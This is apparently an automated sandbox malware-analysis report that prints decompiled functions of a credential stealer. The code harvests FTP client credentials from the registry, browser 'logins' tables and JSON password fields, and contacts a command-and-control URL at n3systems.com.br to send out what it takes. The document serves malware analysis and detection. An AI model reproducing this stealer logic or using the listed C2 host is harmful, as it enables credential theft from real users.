			E0040AB27(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v2068;
				char _v2072;
				intOrPtr _v2076;
				long _t36;
				long _t37;

				_t36 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t37 = _t36;
				if(_t37 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2076 = E00401D15(E00401D15(_a8, "\\"),  &_v2068);
						E004017D5(_t42);
						_v2072 = E00401C8E( *0x4140fe, _v2076, "SiteServers",  &_v20);
						__eflags = _v2072;
						if(_v2072 == 0) {
							L12:
							E004017D5(_v2072);
							E0040AB27(_a4, _v2076);
							E004017D5(_v2076);
							_v12 = _v12 + 1;
							continue;
						}
						__eflags = _v20 - 4;
						if(_v20 != 4) {
							L11:
							E004017D5(_v2072);
							goto L12;
						}
						 *_t18 =  *_v2072;
						__eflags = _v2072 - 0x3e8;
						if(_v2072 > 0x3e8) {
							_v2072 = 0x3e8;
						}
						while(1) {
							__eflags = _v2072;
							if(_v2072 == 0) {
								goto L11;
							}
							_t21 =  &_v2072;
							 *_t21 = _v2072 - 1;
							__eflags =  *_t21;
							E0040A88E( *_t21, _a4, _v2076, _v2072);
						}
						goto L11;
					}
					return RegCloseKey(_v8);
				}
				return _t37;
			}

0x0040ab3d
0x0040ab42
0x0040ab44
0x0040ab4a
0x0040ab51
0x0040ab51
0x0040ab78
0x00000000
0x00000000
0x0040ab9c
0x0040aba2
0x0040abc1
0x0040abc7
0x0040abce
0x0040ac2a
0x0040ac30
0x0040ac3e
0x0040ac49
0x0040ac4e
0x00000000
0x0040ac4e
0x0040abd0
0x0040abd4
0x0040ac1f
0x0040ac25
0x00000000
0x0040ac25
0x0040abde
0x0040abe4
0x0040abee
0x0040abf0
0x0040abf0
0x0040ac16
0x0040ac16
0x0040ac1d
0x00000000
0x00000000
0x0040abfc
0x0040abfc
0x0040abfc
0x0040ac11
0x0040ac11
0x00000000
0x0040ac16
0x00000000
0x0040ac59
0x0040ac5f

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AB3D
RegEnumKeyExA.ADVAPI32 ref: 0040AB71
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AC59

Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A8FA
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A90D
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A920
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A933
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A946
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A959
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A96C

Strings

SiteServers, xrefs: 0040ABAB

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: 0ef5523177a024c00f5b0ed3b398ae05ceb2a5ae07cf5ce938f1a288baa9aaa3
Instruction ID: 47a2a2c135a91701639e8d1277b6cd8de78c57ea59644ea58835ceb1dfa6f9dd
Opcode Fuzzy Hash: 0ef5523177a024c00f5b0ed3b398ae05ceb2a5ae07cf5ce938f1a288baa9aaa3
Instruction Fuzzy Hash: E831FA7190021CEBDF21AB91CC42BDDBAB9BF04304F14C0B6A244711A1DF795AE29F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408B58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B58(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				long _t28;
				long _t29;

				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t29 = _t28;
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t34);
						_v2072 = E00401C8E(_a8, _v2068, "MRU", 0);
						if(_v2072 != 0) {
							E00403E23(_a4, _v2072, 0xbeef0001);
						}
						E004017D5(_v2072);
						E00408B58(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

0x00408b6b
0x00408b70
0x00408b72
0x00408b78
0x00408b7f
0x00408b7f
0x00408ba6
0x00000000
0x00000000
0x00408bca
0x00408bd0
0x00408bea
0x00408bf7
0x00408c07
0x00408c07
0x00408c12
0x00408c23
0x00408c2e
0x00408c33
0x00408c33
0x00000000
0x00408c3e
0x00408c44

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
RegEnumKeyExA.ADVAPI32 ref: 00408B9F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E

Strings

MRU, xrefs: 00408BD7

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: 2c9fd839f1fde82f146f6de45b00de2ca6f82928b52d003cb65db27dc92a9c4f
Instruction ID: dcb6cee7c3816d4270223188b258d8c916240f5df257d018843d2a4017f96bff
Opcode Fuzzy Hash: 2c9fd839f1fde82f146f6de45b00de2ca6f82928b52d003cb65db27dc92a9c4f
Instruction Fuzzy Hash: C321277190010CBADF21AFA1CD02FDD7BB9BF04304F1080BAB655B51A1DFB99A919F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC01, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040BC01(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;
				void* _t52;

				if(_a16 == 5) {
					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "logins");
						if(_t35 == 0) {
							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x41914c = 0xffffffff;
											 *0x419150 = 0xffffffff;
											 *0x419154 = 0xffffffff;
											_t35 = E0040B69A(_v16, E0040B973);
											_v28 = 1;
											if( *0x41914c != 0xffffffff &&  *0x419150 != 0xffffffff &&  *0x419154 != 0xffffffff) {
												_t52 = E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BA2E); // executed
												return _t52;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}

0x0040bc0b
0x0040bc22
0x0040bc2b
0x0040bc31
0x0040bc34
0x0040bc44
0x0040bc46
0x0040bc5d
0x0040bc66
0x0040bc79
0x0040bc7b
0x0040bc92
0x0040bc9b
0x0040bca6
0x0040bcba
0x0040bcc3
0x0040bcc5
0x0040bccf
0x0040bcd9
0x0040bceb
0x0040bcf0
0x0040bcfe
0x0040bd27
0x00000000
0x0040bd27
0x0040bcfe
0x0040bcc3
0x0040bc9b
0x0040bc7b
0x0040bc66
0x0040bc46
0x0040bc2b
0x0040bd2d

APIs

lstrcmpiA.KERNEL32(00000000,logins,?), ref: 0040BC3F
lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BC74

Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA

Strings

table, xrefs: 0040BC6F
logins, xrefs: 0040BC37

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
Instruction ID: 24804250fb1ea017375bfa21efe0a860dce1abc885f05977de560fb28726df4f
Opcode Fuzzy Hash: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
Instruction Fuzzy Hash: 2A31467281024EFAEF219FD0CC45EEEBB78EF15324F104276E520B11E1D3789A949B88

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAA, Relevance: 6.1, APIs: 4, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401BAA(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				int** _t28;
				long _t30;
				char* _t33;
				void* _t36;
				long _t39;
				long _t46;
				signed int _t51;
				char* _t53;

				_t28 = _a16;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				_t53 = 0;
				if(_a20 != 1) {
					if(_a20 != 2) {
						_t51 = 0;
					} else {
						_t51 = 0x100;
					}
				} else {
					_t51 = 0x200;
				}
				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
				if(_t30 == 0) {
					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
						_t53 = E004017EC(_v12 + 1);
						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
						if(_t46 == 0) {
							if(_a16 != 0) {
								_push(_v12);
								_pop( *__eax);
							}
						} else {
							E004017D5(_t53);
							_t53 = 0;
						}
					}
					RegCloseKey(_v8); // executed
				}
				_t33 = _t53;
				if(_t33 != 0 || _a20 >= 2) {
					return _t33;
				} else {
					_t36 = E00401BAA(_a4, _a8, _a12, _a16, _a20 + 1); // executed
					return _t36;
				}
			}

0x00401bb4
0x00401bb6
0x00401bb8
0x00401bb8
0x00401bbe
0x00401bc4
0x00401bd1
0x00401bda
0x00401bd3
0x00401bd3
0x00401bd3
0x00401bc6
0x00401bc6
0x00401bc6
0x00401bef
0x00401bf6
0x00401c0a
0x00401c11
0x00401c2f
0x00401c40
0x00401c47
0x00401c58
0x00401c5a
0x00401c5d
0x00401c5d
0x00401c49
0x00401c4a
0x00401c4f
0x00401c4f
0x00401c47
0x00401c62
0x00401c62
0x00401c69
0x00401c6b
0x00401c8b
0x00401c73
0x00401c84
0x00000000
0x00401c84

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401BEF
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C0A
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401C40
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C62

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: ab99b87888c9aafd431060d37af3ad9a4d5d0217319c08ebbc5b5242cc0110ac
Instruction ID: 6d9cc93ce3cdeedd4ff0784c2595653c4496094a9b1daf344de8f42f3f4a3d5e
Opcode Fuzzy Hash: ab99b87888c9aafd431060d37af3ad9a4d5d0217319c08ebbc5b5242cc0110ac
Instruction Fuzzy Hash: B5217132600108FFEF119E90CD42BEE3BBAEB40344F10403AF511A61B1E779DA91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE7, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406DE7(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				void* _t19;
				void* _t20;
				intOrPtr* _t23;
				intOrPtr* _t27;
				intOrPtr* _t30;
				char* _t32;
				void* _t38;
				char _t40;
				char* _t41;

				_t38 = __ecx;
				_t19 = E00401E53(_a8); // executed
				_t20 = _t19;
				if(_t20 != 0) {
					_t23 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t23;
					if(_t23 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t41 = _v24;
						while(1) {
							__eflags =  *_t41;
							if( *_t41 == 0) {
								break;
							}
							_t27 = StrStrIA(_t41, "\"password\" : \"");
							__eflags = _t27;
							if(_t27 != 0) {
								_t41 = _t27 + lstrlenA("\"password\" : \"");
								_v28 = _t41;
								_t30 = StrStrIA(_t41, "\",");
								__eflags = _t30;
								if(__eflags != 0) {
									 *_t30 = 0;
									_push( *_t30);
									E00406D6F(_t38, __eflags, _a4, _v28);
									_pop(_t40);
									_t32 = _t30;
									 *_t32 = _t40;
									continue;
								}
								break;
							}
							break;
						}
						E00401486(_a4, 0xbeef1001);
						E004014BC(_a4, _v24, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t23;
				} else {
					return _t20;
				}
			}

0x00406de7
0x00406df1
0x00406df6
0x00406df8
0x00406e0b
0x00406e0b
0x00406e0d
0x00406e1b
0x00406e27
0x00406e2c
0x00406e7a
0x00406e7a
0x00406e7d
0x00000000
0x00000000
0x00406e3c
0x00406e3c
0x00406e3e
0x00406e4e
0x00406e50
0x00406e5e
0x00406e5e
0x00406e60
0x00406e66
0x00406e6a
0x00406e71
0x00406e76
0x00406e77
0x00406e78
0x00000000
0x00406e78
0x00000000
0x00406e62
0x00000000
0x00406e40
0x00406e87
0x00406e95
0x00406e9d
0x00000000
0x00406ea6
0x00406eaf
0x00406dfc
0x00406dfc
0x00406dfc

Strings

"password" : ", xrefs: 00406E31, 00406E44

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
Instruction ID: 9cc4e85d6de1a42ee7ad07191c646accbbd50fe48afa7da354d9bcd9ed2f16a6
Opcode Fuzzy Hash: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
Instruction Fuzzy Hash: 4D218136800209BECF12ABA1CC02EEE7E75AF60354F154177F802B51B1D77D4E619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004011D5, Relevance: 6.0, APIs: 4, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011D5(signed int __eax, signed int __edx, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void _v4108;
				void* _t14;
				void* _t15;
				int _t18;
				signed int _t28;

				_t28 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v8 = _t14;
				_t15 = _t14 + 1;
				if(_t15 != 0) {
					while(1) {
						_t18 = ReadFile(_v8,  &_v4108, 0x1000,  &_v12, 0); // executed
						if(_t18 == 0) {
							break;
						}
						E0040115C( &_v4108, _t28, _a8,  &_v4108, _v12); // executed
						if(_v12 != 0) {
							continue;
						} else {
							CloseHandle(_v8);
							return 1;
						}
						goto L6;
					}
					CloseHandle(_v8);
					return 0;
				} else {
					return _t15;
				}
				L6:
			}

0x004011e2
0x004011f6
0x004011fb
0x004011fe
0x004011ff
0x00401205
0x0040121a
0x00401221
0x00000000
0x00000000
0x0040123e
0x00401247
0x00000000
0x00401249
0x0040124c
0x00401257
0x00401257
0x00000000
0x00401247
0x00401226
0x0040122e
0x00401202
0x00401202
0x00401202
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000,00000000,?,?,?,00000000), ref: 004011F6
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000), ref: 0040121A
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000), ref: 00401226

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
Instruction ID: d891ca6dc5143c7d33845585369107a0d95fb6be188be00085997746f24086b0
Opcode Fuzzy Hash: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
Instruction Fuzzy Hash: C2018131A40108BAEF22EA61CC03FDE7679AB14349F1081B6B540F50E1F6F89BD49B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D330, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040D330(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _t16;
				intOrPtr* _t17;
				void* _t22;
				void* _t26;

				_t16 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
				_t17 = _t16;
				if(_t17 != 0) {
					_push(_t17);
					if(_v8 != 4) {
						L9:
						return E004017D5();
					}
					 *_t4 =  *_t17;
					if(_v12 > 0x1f4) {
						_v12 = 0x1f4;
					}
					while(_v12 != 0) {
						wsprintfA( &_v32, "FTP File%d", _v12);
						_t26 = _t26 + 0xc;
						_t22 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
						_t23 = _t22;
						if(_t22 != 0) {
							E00403E4C(_a4, _t23, 0xbeef0001);
							E004017D5(_t23);
						}
						_v12 = _v12 - 1;
					}
					goto L9;
				}
				return _t17;
			}

0x0040d347
0x0040d34c
0x0040d34e
0x0040d350
0x0040d355
0x0040d3b6
0x00000000
0x0040d3b6
0x0040d359
0x0040d363
0x0040d365
0x0040d365
0x0040d3b0
0x0040d37a
0x0040d37f
0x0040d390
0x0040d395
0x0040d397
0x0040d3a3
0x0040d3a8
0x0040d3a8
0x0040d3ad
0x0040d3ad
0x00000000
0x0040d3b0
0x0040d3bc

APIs

wsprintfA.USER32 ref: 0040D37A

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

FTP File%d, xrefs: 0040D371
SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D33F, 0040D388
FTP Count, xrefs: 0040D33A

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
Instruction ID: 20435d818a537ba36105be44c8c75927b15d0ac77e29042cca7cc8f591fb12c9
Opcode Fuzzy Hash: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
Instruction Fuzzy Hash: 1B017C75E40108FEEF00ABD0CC42EEEBA79AB00314F108037B810B21D1D77D8A999A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410B60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
comCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _t8;
				void* _t9;
				int _t13;
				signed int _t24;

				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_push(0); // executed
				L00410DD6(); // executed
				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
				_t9 = E00402B27(_t8, _t24); // executed
				_t10 = _t9;
				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
					 *0x414616 = 1;
				}
				 *0x417695 = E004017EC(0x101);
				_v8 = 0x101;
				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
				if(_t13 == 0) {
					E004017D5( *0x417695);
					 *0x417695 = 0; // executed
				}
				E00401FD8(_t24); // executed
				return E0041038A(E00401CBA(), _t24, "Oguqcogtkec");
			}

0x00410b6a
0x00410b6c
0x00410b6e
0x00410b7d
0x00410b82
0x00410b87
0x00410b89
0x00410b97
0x00410b97
0x00410bab
0x00410bb0
0x00410bc1
0x00410bc8
0x00410bd0
0x00410bd5
0x00410bd5
0x00410bdf
0x00410bf4

APIs

OleInitialize.OLE32(00000000), ref: 00410B6E
GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1

Strings

Oguqcogtkec, xrefs: 00410BE9

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitializeNameUser
String ID: Oguqcogtkec
API String ID: 2272643758-3284314360
Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D

Uniqueness

Uniqueness Score: -1.00%

Function 004105CE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004105CE(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
				char _v20;
				char _v24;
				char* _v28;
				char* _v32;
				void* _t28;
				char* _t34;
				char* _t36;
				char* _t39;
				void* _t41;
				signed int _t44;
				char* _t45;

				_t41 = __ecx;
				_t44 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_t39 = 0; // executed
				E00403DDB(); // executed
				_v24 = 0;
				_t28 = E00401000( &_v24, _t44,  &_v24);
				if(_v24 == 0) {
					_t28 = E00401000( &_v24, _t44,  &_v24);
					if(_v24 == 0) {
						_t28 = E00401000( &_v24, _t44,  &_v24);
					}
				}
				_t49 = _v24;
				if(_v24 == 0) {
					L23:
					E00401019(_t28, _t44, _v24);
					return _t39;
				}
				_t28 = E00410598( &_v20, _t44, _t49, _v24,  &_v20); // executed
				if(_t28 == 1) {
					_t45 = "http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php";
					while( *_t45 != 0) {
						_t39 = _t39;
						if(_t39 == 0) {
							_v32 = 0xa;
							while(1) {
								_v28 = 0;
								_t34 = E00403D77(_t45, _v24,  &_v28);
								_t35 = _t34;
								__eflags = _t34;
								if(_t34 != 0) {
									__eflags = _v28;
									if(_v28 != 0) {
										_t39 = _t35;
										__eflags = _t39;
										if(_t39 == 0) {
											_t36 = E00401ADD(_t41, _t44, _v28);
											_t35 = _t36;
											__eflags = _t36;
											if(_t36 != 0) {
												_t39 = _t35;
											}
										}
									}
								}
								_t28 = E00401019(_t35, _t44, _v28);
								_t39 = _t39;
								__eflags = _t39;
								if(_t39 != 0) {
									break;
								}
								__eflags = _v32;
								if(_v32 == 0) {
									break;
								}
								_v32 = _v32 - 1;
								Sleep(0x1388);
							}
							while(1) {
								__eflags =  *_t45;
								if( *_t45 == 0) {
									break;
								}
								_t45 =  &(_t45[1]);
								__eflags = _t45;
							}
							_t45 =  &(_t45[1]);
							__eflags = _t45;
							continue;
						}
						break;
					}
					_t39 = _t39;
					if(_t39 != 0) {
						_t28 = E0040260B("Client Hash",  &_v20, 0x10);
					}
				}
			}

0x004105ce
0x004105da
0x004105dc
0x004105de
0x004105e3
0x004105ee
0x004105f7
0x004105fd
0x00410606
0x0041060c
0x0041060c
0x00410606
0x00410611
0x00410615
0x004106c7
0x004106ca
0x004106d4
0x004106d4
0x00410622
0x0041062a
0x00410630
0x004106aa
0x004106af
0x004106b1
0x00410637
0x0041063e
0x0041063e
0x0041064d
0x00410652
0x00410652
0x00410654
0x00410656
0x0041065a
0x00410666
0x00410666
0x00410668
0x0041066d
0x00410672
0x00410672
0x00410674
0x0041067e
0x0041067e
0x00410674
0x00410668
0x0041065a
0x00410683
0x00410688
0x00410688
0x0041068a
0x00000000
0x00000000
0x0041068c
0x00410690
0x00000000
0x00000000
0x00410692
0x0041069a
0x0041069a
0x004106a4
0x004106a4
0x004106a7
0x00000000
0x00000000
0x004106a3
0x004106a3
0x004106a3
0x004106a9
0x004106a9
0x00000000
0x004106a9
0x00000000
0x004106b1
0x004106b3
0x004106b5
0x004106c2
0x004106c2
0x004106b5

APIs

Part of subcall function 00403DDB: WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

Sleep.KERNEL32(00001388,00000000,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php,00000000,00000000,00000000,?,00000000), ref: 0041069A

Strings

Client Hash, xrefs: 004106BD
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00410630, 0041064C

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateGlobalSleepStartupStream
String ID: Client Hash$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
API String ID: 2508568950-3662113661
Opcode ID: 573a32c3c9fe6aa8705be14ea68041b733c3ae1353200457669749f91b1b2d53
Instruction ID: cb183f18291e62fb3d84bfda98949270a7e3c9ace301d4c5e7352435445e4723
Opcode Fuzzy Hash: 573a32c3c9fe6aa8705be14ea68041b733c3ae1353200457669749f91b1b2d53
Instruction Fuzzy Hash: 78315071A0020ADADF21ABE1CD867FF7678AB80308F14443BF140B1191D7FD49E69B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409CF4, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409CF4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t8;
				char* _t11;
				void* _t21;
				char* _t22;
				char* _t23;

				_t21 = __edx;
				_v8 = E0040150D(_a4, 0x2a, 0);
				_t8 = E00401DCE(__eflags, 0); // executed
				_t9 = _t8;
				if(_t8 != 0) {
					E00404131(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
					E004017D5(_t9);
				}
				_t23 =  *0x414082; // 0x0
				_t22 =  *0x414086; // 0x0
				if( *_t22 != 0) {
					do {
						_t11 = StrStrIA(_t22, "Odin");
						_t27 = _t11;
						if(_t11 != 0) {
							E00404131(_a4, E0040234A(_t27, _t23), "SiteInfo.QFP", 0xbeef0000);
							E004017D5(_t14);
						}
						while( *_t23 != 0) {
							_t23 = _t23 + 1;
							__eflags = _t23;
						}
						_t23 = _t23 + 1;
						asm("cld");
						asm("repne scasb");
						_t29 =  *_t22;
					} while ( *_t22 != 0);
				}
				return E00401553(_t21, _t29, _a4, _v8);
			}

0x00409cf4
0x00409d08
0x00409d0d
0x00409d12
0x00409d14
0x00409d25
0x00409d2a
0x00409d2a
0x00409d2f
0x00409d35
0x00409d3e
0x00409d40
0x00409d46
0x00409d4b
0x00409d4d
0x00409d64
0x00409d69
0x00409d69
0x00409d71
0x00409d70
0x00409d70
0x00409d70
0x00409d76
0x00409d77
0x00409d7f
0x00409d81
0x00409d81
0x00409d40
0x00409d93

APIs

StrStrIA.SHLWAPI(00000000,Odin), ref: 00409D46

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Odin, xrefs: 00409D40
SiteInfo.QFP, xrefs: 00409D1C, 00409D5B

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
Instruction ID: 79767c209d95ddd877970eb40065194a0b0cfa7ade53a59ec305b62fc9be4706
Opcode Fuzzy Hash: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
Instruction Fuzzy Hash: FF01F9B0590509BAEB112B628C02FAF7E69DFD0324F24013BF945B51E3E67C5E81C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004073FE, Relevance: 4.6, APIs: 3, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073FE(intOrPtr _a4, void* _a8, char* _a12) {
